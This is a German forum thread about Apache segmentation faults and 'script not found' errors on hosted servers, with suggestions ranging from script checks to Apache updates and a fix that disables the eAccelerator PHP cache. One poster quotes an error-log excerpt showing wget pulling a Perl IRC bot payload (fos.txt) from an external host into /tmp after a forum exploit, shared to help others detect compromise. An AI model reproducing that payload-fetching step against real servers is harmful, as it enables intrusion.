Apache Fehler (error_log)
Re: Apache Fehler (error_log)
@dw-wolfi
Ã?bersehe ich hier was? Laut seinen Logs läuft bei Ihm alles mit Perl was also soll dann suphp bewirken???
Ã?bersehe ich hier was? Laut seinen Logs läuft bei Ihm alles mit Perl was also soll dann suphp bewirken???
@jan10001
sorry, hatte nur den post
Standardkonfig ist halt bei Strato visas mit suphp.
sorry, hatte nur den post
gelesen.ne... den server habe ich nicht verändert.. den hab ich so gelassen wie er von Strato vorinstalliert wurde
Standardkonfig ist halt bei Strato visas mit suphp.
@michael20
Der alte Server hatte aber sicherlich nicht die identische Software. ;-) Ich würde auf jedenfall das Script checken, ich vermute es ist irgendwo ein Zeitproblem bei der Datenverarbeitung. Wenn du ganz sicher gehen willst, schalte den Chat ab und richte eine statische, mehere MB große Testwebseite ein und bombandiere deinen Server mit Anfragen.
Der alte Server hatte aber sicherlich nicht die identische Software. ;-) Ich würde auf jedenfall das Script checken, ich vermute es ist irgendwo ein Zeitproblem bei der Datenverarbeitung. Wenn du ganz sicher gehen willst, schalte den Chat ab und richte eine statische, mehere MB große Testwebseite ein und bombandiere deinen Server mit Anfragen.
also am chat liegt es nicht.... diese chatsoftware beuntzen viele und die haben nicht das problem... isn gtchat... der chat ist dafür bekannt das er viele resourcen verbraucht.. nur der server verabchiedet sich eigendlich dann wenn nicht viel Betrieb ist.. und das mit perl ist wie gesagt noch nicht fertig.... aber daran liegt es nicht.. habe den chat komplett über cgi laufen lassen bringt nix..... komplett über perl.. bringt auch nix.. und beim alten server ging beides.... also mod-perl is schon drauf.. nur wuden die pfade noch nicht alle angepasst weil noch einiges getestet werden muss. nur ich will noch nicht alles zuende einrichten solange ich nicht weiß was den fehler verursacht.
der chat lief vorher wie gesagt auf einem server der nur halb soviel RAM hatte.. also liegt es nicht am script..... es muss was anderes sein..
Dann versuche ein Apache Update, mittlerweile sind die 2.0.54 Pakete für SuSE raus.
ALso ich hab dasselbe Problem mit den Segmentation Faults, jedoch unter Debian Sarge (2.6er Kernel) mit Apache 1.3.33 PHP 4.3.10-16 und MySQL 4.0.24_Debian-10sarge1-log
RAM isses net und nachvollzeihbar isses auch net.
Welche Logs (ausser Apache Error Log) sollte ich da denn am besten analysieren?
stehen schon irgendwelche Vermutungen im Raum?
RAM isses net und nachvollzeihbar isses auch net.
Welche Logs (ausser Apache Error Log) sollte ich da denn am besten analysieren?
stehen schon irgendwelche Vermutungen im Raum?
-
Anonymous
Also mei mir kommen seit 3 Tagen auch häufig die Script not found Meldungen und die Probleme mit den Child Prozessen.
Schaut mal nach ob im Ordner /tmp Dateien namens bot.txt oder fos.txt drin sind.
Ich hatte im Apache2 error log nämlich folgende Meldung:
--16:43:08-- http://santogoogle.com/fos.txt
=> `fos.txt.1'
Resolving santogoogle.com... 68.142.234.56, 68.142.234.57, 68.142.234.58, ...
Connecting to santogoogle.com[68.142.234.56]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,848 [text/plain]
0K .......... ....... 100% 92.79 KB/s
16:43:08 (92.79 KB/s) - `fos.txt.1' saved [17848/17848]
Alternativ dasselbe nur mit bot.txt
Dabei handelt es sich um ein Perl Script welches irgendwelche exploits eines Forums nutzt und Sicherheitslücken in nem irc Chat postet.
Ich hatte dieses Forum bis dahin installiert und jetzt mal abgeschaltet. Seitdem ist Ruhe.
Ich weiss halt nur nicht wie lange.
Es ist schwer nach der Lücke zu suchen, da die Script not found Meldung keinen Pfad oder keine Datei angibt.
Vielleicht hat ja einer von euch noch ne Idee.
Chris
Schaut mal nach ob im Ordner /tmp Dateien namens bot.txt oder fos.txt drin sind.
Ich hatte im Apache2 error log nämlich folgende Meldung:
--16:43:08-- http://santogoogle.com/fos.txt
=> `fos.txt.1'
Resolving santogoogle.com... 68.142.234.56, 68.142.234.57, 68.142.234.58, ...
Connecting to santogoogle.com[68.142.234.56]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,848 [text/plain]
0K .......... ....... 100% 92.79 KB/s
16:43:08 (92.79 KB/s) - `fos.txt.1' saved [17848/17848]
Alternativ dasselbe nur mit bot.txt
Dabei handelt es sich um ein Perl Script welches irgendwelche exploits eines Forums nutzt und Sicherheitslücken in nem irc Chat postet.
Ich hatte dieses Forum bis dahin installiert und jetzt mal abgeschaltet. Seitdem ist Ruhe.
Ich weiss halt nur nicht wie lange.
Es ist schwer nach der Lücke zu suchen, da die Script not found Meldung keinen Pfad oder keine Datei angibt.
Vielleicht hat ja einer von euch noch ne Idee.
Chris
jo z.B. nonexec für /tmp
also ich hab den Ã?beltäter bei mir gefunden.
es war der eAcellerator PHP Cache.
sobald ich die Cache Funktion deaktiviere läuft der Apache rund, wenn ich ihn aktiviere beginnt er nach unbestimmter Zeit mit Segfaults.
Hab jetzt APC als Cache und eAcellerator nur noch als Optimizer laufen.
Ich hoffe, ich konnte etwas licht ins dunkel bringen.
es war der eAcellerator PHP Cache.
sobald ich die Cache Funktion deaktiviere läuft der Apache rund, wenn ich ihn aktiviere beginnt er nach unbestimmter Zeit mit Segfaults.
Hab jetzt APC als Cache und eAcellerator nur noch als Optimizer laufen.
Ich hoffe, ich konnte etwas licht ins dunkel bringen.